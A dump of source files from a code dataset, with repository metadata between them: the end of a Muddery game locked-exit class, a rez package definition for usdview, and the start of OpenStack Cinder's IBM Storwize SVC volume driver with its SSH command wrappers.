self.auto_unlock = getattr(self.system, "auto_unlock", False)
self.unlock_forever = getattr(self.system, "unlock_forever", True)
def at_before_traverse(self, traversing_object):
"""
Called just before an object uses this object to traverse to
another object (i.e. this object is a type of Exit)
Args:
traversing_object (Object): The object traversing us.
Notes:
The target destination should normally be available as
`self.destination`.
If this method returns False/None, the traverse is cancelled
before it is even started.
"""
if not super(MudderyLockedExit, self).at_before_traverse(traversing_object):
return False
# Only can pass exits which have already been unlocked.
if traversing_object.is_exit_unlocked(self.get_data_key()):
if not self.unlock_forever:
# lock the exit again
traversing_object.lock_exit(self)
return True
if self.auto_unlock and self.can_unlock(traversing_object):
# Can unlock the exit automatically.
if self.unlock_forever:
# Unlock it.
traversing_object.unlock_exit(self)
return True
# Show the object's appearance.
appearance = self.get_appearance(traversing_object)
traversing_object.msg({"look_obj": appearance})
return False
def can_unlock(self, caller):
"""
Unlock an exit.
"""
# Only can unlock exits which match there conditions.
return STATEMENT_HANDLER.match_condition(self.unlock_condition, caller, self)
def get_appearance(self, caller):
"""
This is a convenient hook for a 'look'
command to call.
"""
# Get name and description.
if caller.is_exit_unlocked(self.get_data_key()):
# If is unlocked, use common appearance.
return super(MudderyLockedExit, self).get_appearance(caller)
can_unlock = self.can_unlock(caller)
if self.auto_unlock and can_unlock:
if self.unlock_forever:
# Automatically unlock the exit when a character looking at it.
caller.unlock_exit(self)
# If is unlocked, use common appearance.
return super(MudderyLockedExit, self).get_appearance(caller)
cmds = []
if can_unlock:
# show unlock command
verb = self.unlock_verb
if not verb:
verb = _("Unlock")
cmds = [{"name": verb, "cmd": "unlock_exit", "args": self.dbref}]
info = {"dbref": self.dbref,
"name": self.name,
"desc": self.locked_desc,
"cmds": cmds}
return info
def get_available_commands(self, caller):
"""
This returns a list of available commands.
"args" must be a string without ' and ", usually it is self.dbref.
"""
if caller.is_exit_unlocked(self.get_data_key()):
# If is unlocked, use common commands.
return super(MudderyLockedExit, self).get_available_commands(caller)
cmds = []
can_unlock = STATEMENT_HANDLER.match_condition(self.unlock_condition, caller, self)
if can_unlock:
# show unlock command
verb = self.unlock_verb
if not verb:
verb = _("Unlock")
cmds = [{"name": verb, "cmd": "unlock", "args": self.dbref}]
return cmds
| [
"luyijun999@gmail.com"
] | luyijun999@gmail.com |
dd4fb7ea275ee365886a27cecfb16f952e6bafe3 | 87f50b69a3c4946c24c7ff32893c8ced99b73256 | /usdview/18.09/package.py | 2773af73d07098b971800dcc8da1134b35a35896 | [
"MIT"
] | permissive | UTS-AnimalLogicAcademy/open-source-rez-packages | d892f38d838754603405eef80bf3e77b2a727d0b | 809de83c9802b0166d8f88e0865612a75a4c032d | refs/heads/master | 2022-11-24T13:13:28.143401 | 2022-11-07T23:55:51 | 2022-11-07T23:55:51 | 117,476,450 | 66 | 8 | MIT | 2021-06-22T06:42:49 | 2018-01-14T23:42:11 | CMake | UTF-8 | Python | false | false | 182 | py | # -*- coding: utf-8 -*-
name = 'usdview'
version = '18.09'
requires = [
'pyside-1.2',
'usd-18.09'
]
def commands():
env.DEFAULT_USD.set('{root}/bin/DefaultUSD.usda')
| [
"daniel.flood-1@uts.edu.au"
] | daniel.flood-1@uts.edu.au |
75e67f9d2f99485e02e71e9d13c80edfe59d577a | 42c63d5f9c724c99ba93f77bdead51891fcf8623 | /OpenStack-Mitaka-src/cinder/cinder/volume/drivers/ibm/storwize_svc/storwize_svc_common.py | f5e43d96d19eda583d719b33f56058a3e20c740f | [
"Apache-2.0"
] | permissive | liyongle/openstack-mitaka | 115ae819d42ed9bf0922a8c0ab584fa99a3daf92 | 5ccd31c6c3b9aa68b9db1bdafcf1b029e8e37b33 | refs/heads/master | 2021-07-13T04:57:53.488114 | 2019-03-07T13:26:25 | 2019-03-07T13:26:25 | 174,311,782 | 0 | 1 | null | 2020-07-24T01:44:47 | 2019-03-07T09:18:55 | Python | UTF-8 | Python | false | false | 139,105 | py | # Copyright 2015 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import math
import paramiko
import random
import re
import string
import time
import unicodedata
from eventlet import greenthread
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils
from oslo_utils import strutils
from oslo_utils import units
import six
from cinder import context
from cinder import exception
from cinder import ssh_utils
from cinder import utils as cinder_utils
from cinder.i18n import _, _LE, _LI, _LW
from cinder.objects import fields
from cinder.volume import driver
from cinder.volume.drivers.ibm.storwize_svc import (
replication as storwize_rep)
from cinder.volume.drivers.san import san
from cinder.volume import qos_specs
from cinder.volume import utils
from cinder.volume import volume_types
INTERVAL_1_SEC = 1
DEFAULT_TIMEOUT = 15
LOG = logging.getLogger(__name__)
storwize_svc_opts = [
cfg.ListOpt('storwize_svc_volpool_name',
default=['volpool'],
help='Comma separated list of storage system storage '
'pools for volumes.'),
cfg.IntOpt('storwize_svc_vol_rsize',
default=2,
min=-1, max=100,
help='Storage system space-efficiency parameter for volumes '
'(percentage)'),
cfg.IntOpt('storwize_svc_vol_warning',
default=0,
min=-1, max=100,
help='Storage system threshold for volume capacity warnings '
'(percentage)'),
cfg.BoolOpt('storwize_svc_vol_autoexpand',
default=True,
help='Storage system autoexpand parameter for volumes '
'(True/False)'),
cfg.IntOpt('storwize_svc_vol_grainsize',
default=256,
help='Storage system grain size parameter for volumes '
'(32/64/128/256)'),
cfg.BoolOpt('storwize_svc_vol_compression',
default=False,
help='Storage system compression option for volumes'),
cfg.BoolOpt('storwize_svc_vol_easytier',
default=True,
help='Enable Easy Tier for volumes'),
cfg.IntOpt('storwize_svc_vol_iogrp',
default=0,
help='The I/O group in which to allocate volumes'),
cfg.IntOpt('storwize_svc_flashcopy_timeout',
default=120,
min=1, max=600,
help='Maximum number of seconds to wait for FlashCopy to be '
'prepared.'),
cfg.BoolOpt('storwize_svc_multihostmap_enabled',
default=True,
help='This option no longer has any affect. It is deprecated '
'and will be removed in the next release.',
deprecated_for_removal=True),
cfg.BoolOpt('storwize_svc_allow_tenant_qos',
default=False,
help='Allow tenants to specify QOS on create'),
cfg.StrOpt('storwize_svc_stretched_cluster_partner',
default=None,
help='If operating in stretched cluster mode, specify the '
'name of the pool in which mirrored copies are stored.'
'Example: "pool2"'),
cfg.StrOpt('storwize_san_secondary_ip',
default=None,
help='Specifies secondary management IP or hostname to be '
'used if san_ip is invalid or becomes inaccessible.'),
cfg.BoolOpt('storwize_svc_vol_nofmtdisk',
default=False,
help='Specifies that the volume not be formatted during '
'creation.'),
cfg.IntOpt('storwize_svc_flashcopy_rate',
default=50,
min=1, max=100,
help='Specifies the Storwize FlashCopy copy rate to be used '
'when creating a full volume copy. The default is rate '
'is 50, and the valid rates are 1-100.'),
]
CONF = cfg.CONF
CONF.register_opts(storwize_svc_opts)
class StorwizeSSH(object):
"""SSH interface to IBM Storwize family and SVC storage systems."""
def __init__(self, run_ssh):
self._ssh = run_ssh
def _run_ssh(self, ssh_cmd):
try:
return self._ssh(ssh_cmd)
except processutils.ProcessExecutionError as e:
msg = (_('CLI Exception output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': e.stdout,
'err': e.stderr})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def run_ssh_info(self, ssh_cmd, delim='!', with_header=False):
"""Run an SSH command and return parsed output."""
raw = self._run_ssh(ssh_cmd)
return CLIResponse(raw, ssh_cmd=ssh_cmd, delim=delim,
with_header=with_header)
def run_ssh_assert_no_output(self, ssh_cmd):
"""Run an SSH command and assert no output returned."""
out, err = self._run_ssh(ssh_cmd)
if len(out.strip()) != 0:
msg = (_('Expected no output from CLI command %(cmd)s, '
'got %(out)s.') % {'cmd': ' '.join(ssh_cmd), 'out': out})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def run_ssh_check_created(self, ssh_cmd):
"""Run an SSH command and return the ID of the created object."""
out, err = self._run_ssh(ssh_cmd)
try:
match_obj = re.search(r'\[([0-9]+)\],? successfully created', out)
return match_obj.group(1)
except (AttributeError, IndexError):
msg = (_('Failed to parse CLI output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': out,
'err': err})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def lsnode(self, node_id=None):
with_header = True
ssh_cmd = ['svcinfo', 'lsnode', '-delim', '!']
if node_id:
with_header = False
ssh_cmd.append(node_id)
return self.run_ssh_info(ssh_cmd, with_header=with_header)
def lslicense(self):
ssh_cmd = ['svcinfo', 'lslicense', '-delim', '!']
return self.run_ssh_info(ssh_cmd)[0]
def lsguicapabilities(self):
ssh_cmd = ['svcinfo', 'lsguicapabilities', '-delim', '!']
return self.run_ssh_info(ssh_cmd)[0]
def lssystem(self):
ssh_cmd = ['svcinfo', 'lssystem', '-delim', '!']
return self.run_ssh_info(ssh_cmd)[0]
def lsmdiskgrp(self, pool):
ssh_cmd = ['svcinfo', 'lsmdiskgrp', '-bytes', '-delim', '!',
'"%s"' % pool]
return self.run_ssh_info(ssh_cmd)[0]
def lsiogrp(self):
ssh_cmd = ['svcinfo', 'lsiogrp', '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lsportip(self):
ssh_cmd = ['svcinfo', 'lsportip', '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
@staticmethod
def _create_port_arg(port_type, port_name):
if port_type == 'initiator':
port = ['-iscsiname']
else:
port = ['-hbawwpn']
port.append(port_name)
return port
def mkhost(self, host_name, port_type, port_name):
port = self._create_port_arg(port_type, port_name)
ssh_cmd = ['svctask', 'mkhost', '-force'] + port
ssh_cmd += ['-name', '"%s"' % host_name]
return self.run_ssh_check_created(ssh_cmd)
def addhostport(self, host, port_type, port_name):
port = self._create_port_arg(port_type, port_name)
ssh_cmd = ['svctask', 'addhostport', '-force'] + port + ['"%s"' % host]
self.run_ssh_assert_no_output(ssh_cmd)
def lshost(self, host=None):
with_header = True
ssh_cmd = ['svcinfo', 'lshost', '-delim', '!']
if host:
with_header = False
ssh_cmd.append('"%s"' % host)
return self.run_ssh_info(ssh_cmd, with_header=with_header)
def add_chap_secret(self, secret, host):
ssh_cmd = ['svctask', 'chhost', '-chapsecret', secret, '"%s"' % host]
self.run_ssh_assert_no_output(ssh_cmd)
def lsiscsiauth(self):
ssh_cmd = ['svcinfo', 'lsiscsiauth', '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lsfabric(self, wwpn=None, host=None):
ssh_cmd = ['svcinfo', 'lsfabric', '-delim', '!']
if wwpn:
ssh_cmd.extend(['-wwpn', wwpn])
elif host:
ssh_cmd.extend(['-host', '"%s"' % host])
else:
msg = (_('Must pass wwpn or host to lsfabric.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
return self.run_ssh_info(ssh_cmd, with_header=True)
def mkvdiskhostmap(self, host, vdisk, lun, multihostmap):
"""Map vdisk to host.
If vdisk already mapped and multihostmap is True, use the force flag.
"""
ssh_cmd = ['svctask', 'mkvdiskhostmap', '-host', '"%s"' % host,
'-scsi', lun, vdisk]
if multihostmap:
ssh_cmd.insert(ssh_cmd.index('mkvdiskhostmap') + 1, '-force')
try:
self.run_ssh_check_created(ssh_cmd)
except Exception as ex:
if (not multihostmap and hasattr(ex, 'message') and
'CMMVC6071E' in ex.message):
LOG.error(_LE('storwize_svc_multihostmap_enabled is set '
'to False, not allowing multi host mapping.'))
raise exception.VolumeDriverException(
message=_('CMMVC6071E The VDisk-to-host mapping was not '
'created because the VDisk is already mapped '
'to a host.\n"'))
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error mapping VDisk-to-host'))
def mkrcrelationship(self, master, aux, system, name, asyncmirror):
ssh_cmd = ['svctask', 'mkrcrelationship', '-master', master,
'-aux', aux, '-cluster', system, '-name', name]
if asyncmirror:
ssh_cmd.append('-global')
return self.run_ssh_check_created(ssh_cmd)
def rmrcrelationship(self, relationship):
ssh_cmd = ['svctask', 'rmrcrelationship', relationship]
self.run_ssh_assert_no_output(ssh_cmd)
def switchrelationship(self, relationship, aux=True):
primary = 'aux' if aux else 'master'
ssh_cmd = ['svctask', 'switchrcrelationship', '-primary',
primary, relationship]
self.run_ssh_assert_no_output(ssh_cmd)
def startrcrelationship(self, rc_rel, primary=None):
ssh_cmd = ['svctask', 'startrcrelationship', '-force']
if primary:
ssh_cmd.extend(['-primary', primary])
ssh_cmd.append(rc_rel)
self.run_ssh_assert_no_output(ssh_cmd)
def stoprcrelationship(self, relationship, access=False):
ssh_cmd = ['svctask', 'stoprcrelationship']
if access:
ssh_cmd.append('-access')
ssh_cmd.append(relationship)
self.run_ssh_assert_no_output(ssh_cmd)
def lsrcrelationship(self, volume_name):
key_value = 'name=%s' % volume_name
ssh_cmd = ['svcinfo', 'lsrcrelationship', '-filtervalue',
key_value, '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lspartnership(self, system_name):
key_value = 'name=%s' % system_name
ssh_cmd = ['svcinfo', 'lspartnership', '-filtervalue',
key_value, '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lspartnershipcandidate(self):
ssh_cmd = ['svcinfo', 'lspartnershipcandidate', '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def mkippartnership(self, ip_v4, bandwith):
ssh_cmd = ['svctask', 'mkippartnership', '-type', 'ipv4',
'-clusterip', ip_v4, '-linkbandwidthmbits',
six.text_type(bandwith)]
return self.run_ssh_assert_no_output(ssh_cmd)
def mkfcpartnership(self, system_name, bandwith):
ssh_cmd = ['svctask', 'mkfcpartnership', '-linkbandwidthmbits',
six.text_type(bandwith), system_name]
return self.run_ssh_assert_no_output(ssh_cmd)
def startpartnership(self, partnership_id):
ssh_cmd = ['svctask', 'chpartnership', '-start', partnership_id]
return self.run_ssh_assert_no_output(ssh_cmd)
def rmvdiskhostmap(self, host, vdisk):
ssh_cmd = ['svctask', 'rmvdiskhostmap', '-host', '"%s"' % host, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def lsvdiskhostmap(self, vdisk):
ssh_cmd = ['svcinfo', 'lsvdiskhostmap', '-delim', '!', vdisk]
return self.run_ssh_info(ssh_cmd, with_header=True)
def lshostvdiskmap(self, host):
ssh_cmd = ['svcinfo', 'lshostvdiskmap', '-delim', '!', '"%s"' % host]
return self.run_ssh_info(ssh_cmd, with_header=True)
def rmhost(self, host):
ssh_cmd = ['svctask', 'rmhost', '"%s"' % host]
self.run_ssh_assert_no_output(ssh_cmd)
def mkvdisk(self, name, size, units, pool, opts, params):
ssh_cmd = ['svctask', 'mkvdisk', '-name', name, '-mdiskgrp',
'"%s"' % pool, '-iogrp', six.text_type(opts['iogrp']),
'-size', size, '-unit', units] + params
return self.run_ssh_check_created(ssh_cmd)
def rmvdisk(self, vdisk, force=True):
ssh_cmd = ['svctask', 'rmvdisk']
if force:
ssh_cmd += ['-force']
ssh_cmd += [vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def lsvdisk(self, vdisk):
"""Return vdisk attributes or None if it doesn't exist."""
ssh_cmd = ['svcinfo', 'lsvdisk', '-bytes', '-delim', '!', vdisk]
out, err = self._ssh(ssh_cmd, check_exit_code=False)
if not len(err):
return CLIResponse((out, err), ssh_cmd=ssh_cmd, delim='!',
with_header=False)[0]
if err.startswith('CMMVC5754E'):
return None
msg = (_('CLI Exception output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': out,
'err': err})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def lsvdisks_from_filter(self, filter_name, value):
"""Performs an lsvdisk command, filtering the results as specified.
Returns an iterable for all matching vdisks.
"""
ssh_cmd = ['svcinfo', 'lsvdisk', '-bytes', '-delim', '!',
'-filtervalue', '%s=%s' % (filter_name, value)]
return self.run_ssh_info(ssh_cmd, with_header=True)
def chvdisk(self, vdisk, params):
ssh_cmd = ['svctask', 'chvdisk'] + params + [vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def movevdisk(self, vdisk, iogrp):
ssh_cmd = ['svctask', 'movevdisk', '-iogrp', iogrp, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def expandvdisksize(self, vdisk, amount):
ssh_cmd = (
['svctask', 'expandvdisksize', '-size', six.text_type(amount),
'-unit', 'gb', vdisk])
self.run_ssh_assert_no_output(ssh_cmd)
def mkfcmap(self, source, target, full_copy, copy_rate, consistgrp=None):
ssh_cmd = ['svctask', 'mkfcmap', '-source', source, '-target',
target, '-autodelete']
if not full_copy:
ssh_cmd.extend(['-copyrate', '0'])
else:
ssh_cmd.extend(['-copyrate', six.text_type(copy_rate)])
if consistgrp:
ssh_cmd.extend(['-consistgrp', consistgrp])
out, err = self._ssh(ssh_cmd, check_exit_code=False)
if 'successfully created' not in out:
msg = (_('CLI Exception output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': out,
'err': err})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
try:
match_obj = re.search(r'FlashCopy Mapping, id \[([0-9]+)\], '
'successfully created', out)
fc_map_id = match_obj.group(1)
except (AttributeError, IndexError):
msg = (_('Failed to parse CLI output:\n command: %(cmd)s\n '
'stdout: %(out)s\n stderr: %(err)s.') %
{'cmd': ssh_cmd,
'out': out,
'err': err})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return fc_map_id
def prestartfcmap(self, fc_map_id):
ssh_cmd = ['svctask', 'prestartfcmap', fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def startfcmap(self, fc_map_id):
ssh_cmd = ['svctask', 'startfcmap', fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def prestartfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'prestartfcconsistgrp', fc_consist_group]
self.run_ssh_assert_no_output(ssh_cmd)
def startfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'startfcconsistgrp', fc_consist_group]
self.run_ssh_assert_no_output(ssh_cmd)
def stopfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'stopfcconsistgrp', fc_consist_group]
self.run_ssh_assert_no_output(ssh_cmd)
def chfcmap(self, fc_map_id, copyrate='50', autodel='on'):
ssh_cmd = ['svctask', 'chfcmap', '-copyrate', copyrate,
'-autodelete', autodel, fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def stopfcmap(self, fc_map_id):
ssh_cmd = ['svctask', 'stopfcmap', fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def rmfcmap(self, fc_map_id):
ssh_cmd = ['svctask', 'rmfcmap', '-force', fc_map_id]
self.run_ssh_assert_no_output(ssh_cmd)
def lsvdiskfcmappings(self, vdisk):
ssh_cmd = ['svcinfo', 'lsvdiskfcmappings', '-delim', '!', vdisk]
return self.run_ssh_info(ssh_cmd, with_header=True)
def lsfcmap(self, fc_map_id):
ssh_cmd = ['svcinfo', 'lsfcmap', '-filtervalue',
'id=%s' % fc_map_id, '-delim', '!']
return self.run_ssh_info(ssh_cmd, with_header=True)
def lsfcconsistgrp(self, fc_consistgrp):
ssh_cmd = ['svcinfo', 'lsfcconsistgrp', '-delim', '!', fc_consistgrp]
out, err = self._ssh(ssh_cmd)
return CLIResponse((out, err), ssh_cmd=ssh_cmd, delim='!',
with_header=False)
def mkfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'mkfcconsistgrp', '-name', fc_consist_group]
return self.run_ssh_check_created(ssh_cmd)
def rmfcconsistgrp(self, fc_consist_group):
ssh_cmd = ['svctask', 'rmfcconsistgrp', '-force', fc_consist_group]
return self.run_ssh_assert_no_output(ssh_cmd)
def addvdiskcopy(self, vdisk, dest_pool, params):
ssh_cmd = (['svctask', 'addvdiskcopy'] + params + ['-mdiskgrp',
'"%s"' % dest_pool, vdisk])
return self.run_ssh_check_created(ssh_cmd)
def lsvdiskcopy(self, vdisk, copy_id=None):
ssh_cmd = ['svcinfo', 'lsvdiskcopy', '-delim', '!']
with_header = True
if copy_id:
ssh_cmd += ['-copy', copy_id]
with_header = False
ssh_cmd += [vdisk]
return self.run_ssh_info(ssh_cmd, with_header=with_header)
def lsvdisksyncprogress(self, vdisk, copy_id):
ssh_cmd = ['svcinfo', 'lsvdisksyncprogress', '-delim', '!',
'-copy', copy_id, vdisk]
return self.run_ssh_info(ssh_cmd, with_header=True)[0]
def rmvdiskcopy(self, vdisk, copy_id):
ssh_cmd = ['svctask', 'rmvdiskcopy', '-copy', copy_id, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def addvdiskaccess(self, vdisk, iogrp):
ssh_cmd = ['svctask', 'addvdiskaccess', '-iogrp', iogrp, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def rmvdiskaccess(self, vdisk, iogrp):
ssh_cmd = ['svctask', 'rmvdiskaccess', '-iogrp', iogrp, vdisk]
self.run_ssh_assert_no_output(ssh_cmd)
def lsportfc(self, node_id):
ssh_cmd = ['svcinfo', 'lsportfc', '-delim', '!',
'-filtervalue', 'node_id=%s' % node_id]
return self.run_ssh_info(ssh_cmd, with_header=True)
class StorwizeHelpers(object):
# All the supported QoS key are saved in this dict. When a new
# key is going to add, three values MUST be set:
# 'default': to indicate the value, when the parameter is disabled.
# 'param': to indicate the corresponding parameter in the command.
# 'type': to indicate the type of this value.
svc_qos_keys = {'IOThrottling': {'default': '0',
'param': 'rate',
'type': int}}
def __init__(self, run_ssh):
self.ssh = StorwizeSSH(run_ssh)
self.check_fcmapping_interval = 3
@staticmethod
def handle_keyerror(cmd, out):
msg = (_('Could not find key in output of command %(cmd)s: %(out)s.')
% {'out': out, 'cmd': cmd})
raise exception.VolumeBackendAPIException(data=msg)
def compression_enabled(self):
"""Return whether or not compression is enabled for this system."""
resp = self.ssh.lslicense()
keys = ['license_compression_enclosures',
'license_compression_capacity']
for key in keys:
if resp.get(key, '0') != '0':
return True
# lslicense is not used for V9000 compression check
# compression_enclosures and compression_capacity are
# always 0. V9000 uses license_scheme 9846 as an
# indicator and can always do compression
try:
resp = self.ssh.lsguicapabilities()
if resp.get('license_scheme', '0') == '9846':
return True
except exception.VolumeBackendAPIException as war:
LOG.warning(_LW("Failed to run lsguicapability. "
"Exception: %s."), war)
return False
def get_system_info(self):
"""Return system's name, ID, and code level."""
resp = self.ssh.lssystem()
level = resp['code_level']
match_obj = re.search('([0-9].){3}[0-9]', level)
if match_obj is None:
msg = _('Failed to get code level (%s).') % level
raise exception.VolumeBackendAPIException(data=msg)
code_level = match_obj.group().split('.')
return {'code_level': tuple([int(x) for x in code_level]),
'system_name': resp['name'],
'system_id': resp['id']}
def get_pool_attrs(self, pool):
"""Return attributes for the specified pool."""
return self.ssh.lsmdiskgrp(pool)
def get_available_io_groups(self):
"""Return list of available IO groups."""
iogrps = []
resp = self.ssh.lsiogrp()
for iogrp in resp:
try:
if int(iogrp['node_count']) > 0:
iogrps.append(int(iogrp['id']))
except KeyError:
self.handle_keyerror('lsiogrp', iogrp)
except ValueError:
msg = (_('Expected integer for node_count, '
'svcinfo lsiogrp returned: %(node)s.') %
{'node': iogrp['node_count']})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return iogrps
def get_volume_io_group(self, vol_name):
vdisk = self.ssh.lsvdisk(vol_name)
if vdisk:
resp = self.ssh.lsiogrp()
for iogrp in resp:
if iogrp['name'] == vdisk['IO_group_name']:
return int(iogrp['id'])
return None
def get_node_info(self):
"""Return dictionary containing information on system's nodes."""
nodes = {}
resp = self.ssh.lsnode()
for node_data in resp:
try:
if node_data['status'] != 'online':
continue
node = {}
node['id'] = node_data['id']
node['name'] = node_data['name']
node['IO_group'] = node_data['IO_group_id']
node['iscsi_name'] = node_data['iscsi_name']
node['WWNN'] = node_data['WWNN']
node['status'] = node_data['status']
node['WWPN'] = []
node['ipv4'] = []
node['ipv6'] = []
node['enabled_protocols'] = []
nodes[node['id']] = node
except KeyError:
self.handle_keyerror('lsnode', node_data)
return nodes
def add_iscsi_ip_addrs(self, storage_nodes):
"""Add iSCSI IP addresses to system node information."""
resp = self.ssh.lsportip()
for ip_data in resp:
try:
state = ip_data['state']
if ip_data['node_id'] in storage_nodes and (
state == 'configured' or state == 'online'):
node = storage_nodes[ip_data['node_id']]
if len(ip_data['IP_address']):
node['ipv4'].append(ip_data['IP_address'])
if len(ip_data['IP_address_6']):
node['ipv6'].append(ip_data['IP_address_6'])
except KeyError:
self.handle_keyerror('lsportip', ip_data)
def add_fc_wwpns(self, storage_nodes):
"""Add FC WWPNs to system node information."""
for key in storage_nodes:
node = storage_nodes[key]
wwpns = set(node['WWPN'])
resp = self.ssh.lsportfc(node_id=node['id'])
for port_info in resp:
if (port_info['type'] == 'fc' and
port_info['status'] == 'active'):
wwpns.add(port_info['WWPN'])
node['WWPN'] = list(wwpns)
LOG.info(_LI('WWPN on node %(node)s: %(wwpn)s.'),
{'node': node['id'], 'wwpn': node['WWPN']})
def add_chap_secret_to_host(self, host_name):
"""Generate and store a randomly-generated CHAP secret for the host."""
chap_secret = utils.generate_password()
self.ssh.add_chap_secret(chap_secret, host_name)
return chap_secret
def get_chap_secret_for_host(self, host_name):
"""Generate and store a randomly-generated CHAP secret for the host."""
resp = self.ssh.lsiscsiauth()
host_found = False
for host_data in resp:
try:
if host_data['name'] == host_name:
host_found = True
if host_data['iscsi_auth_method'] == 'chap':
return host_data['iscsi_chap_secret']
except KeyError:
self.handle_keyerror('lsiscsiauth', host_data)
if not host_found:
msg = _('Failed to find host %s.') % host_name
raise exception.VolumeBackendAPIException(data=msg)
return None
def get_conn_fc_wwpns(self, host):
wwpns = set()
resp = self.ssh.lsfabric(host=host)
for wwpn in resp.select('local_wwpn'):
if wwpn is not None:
wwpns.add(wwpn)
return list(wwpns)
def get_host_from_connector(self, connector):
"""Return the Storwize host described by the connector."""
LOG.debug('Enter: get_host_from_connector: %s.', connector)
# If we have FC information, we have a faster lookup option
host_name = None
if 'wwpns' in connector:
for wwpn in connector['wwpns']:
resp = self.ssh.lsfabric(wwpn=wwpn)
for wwpn_info in resp:
try:
if (wwpn_info['remote_wwpn'] and
wwpn_info['name'] and
wwpn_info['remote_wwpn'].lower() ==
wwpn.lower()):
host_name = wwpn_info['name']
except KeyError:
self.handle_keyerror('lsfabric', wwpn_info)
if host_name:
LOG.debug('Leave: get_host_from_connector: host %s.', host_name)
return host_name
# That didn't work, so try exhaustive search
hosts_info = self.ssh.lshost()
found = False
for name in hosts_info.select('name'):
resp = self.ssh.lshost(host=name)
if 'initiator' in connector:
for iscsi in resp.select('iscsi_name'):
if iscsi == connector['initiator']:
host_name = name
found = True
break
elif 'wwpns' in connector and len(connector['wwpns']):
connector_wwpns = [str(x).lower() for x in connector['wwpns']]
for wwpn in resp.select('WWPN'):
if wwpn and wwpn.lower() in connector_wwpns:
host_name = name
found = True
break
if found:
break
LOG.debug('Leave: get_host_from_connector: host %s.', host_name)
return host_name
def create_host(self, connector):
"""Create a new host on the storage system.
We create a host name and associate it with the given connection
information. The host name will be a cleaned up version of the given
host name (at most 55 characters), plus a random 8-character suffix to
avoid collisions. The total length should be at most 63 characters.
"""
LOG.debug('Enter: create_host: host %s.', connector['host'])
# Before we start, make sure host name is a string and that we have at
# least one port.
host_name = connector['host']
if not isinstance(host_name, six.string_types):
msg = _('create_host: Host name is not unicode or string.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
ports = []
if 'initiator' in connector:
ports.append(['initiator', '%s' % connector['initiator']])
if 'wwpns' in connector:
for wwpn in connector['wwpns']:
ports.append(['wwpn', '%s' % wwpn])
if not len(ports):
msg = _('create_host: No initiators or wwpns supplied.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
# Build a host name for the Storwize host - first clean up the name
if isinstance(host_name, six.text_type):
host_name = unicodedata.normalize('NFKD', host_name).encode(
'ascii', 'replace').decode('ascii')
for num in range(0, 128):
ch = str(chr(num))
if not ch.isalnum() and ch not in [' ', '.', '-', '_']:
host_name = host_name.replace(ch, '-')
# Storwize doesn't like hostname that doesn't starts with letter or _.
if not re.match('^[A-Za-z]', host_name):
host_name = '_' + host_name
# Add a random 8-character suffix to avoid collisions
rand_id = str(random.randint(0, 99999999)).zfill(8)
host_name = '%s-%s' % (host_name[:55], rand_id)
# Create a host with one port
port = ports.pop(0)
self.ssh.mkhost(host_name, port[0], port[1])
# Add any additional ports to the host
for port in ports:
self.ssh.addhostport(host_name, port[0], port[1])
LOG.debug('Leave: create_host: host %(host)s - %(host_name)s.',
{'host': connector['host'], 'host_name': host_name})
return host_name
def delete_host(self, host_name):
self.ssh.rmhost(host_name)
def map_vol_to_host(self, volume_name, host_name, multihostmap):
"""Create a mapping between a volume to a host."""
LOG.debug('Enter: map_vol_to_host: volume %(volume_name)s to '
'host %(host_name)s.',
{'volume_name': volume_name, 'host_name': host_name})
# Check if this volume is already mapped to this host
mapped = False
luns_used = []
result_lun = '-1'
resp = self.ssh.lshostvdiskmap(host_name)
for mapping_info in resp:
luns_used.append(int(mapping_info['SCSI_id']))
if mapping_info['vdisk_name'] == volume_name:
mapped = True
result_lun = mapping_info['SCSI_id']
if not mapped:
# Find unused lun
luns_used.sort()
result_lun = str(len(luns_used))
for index, n in enumerate(luns_used):
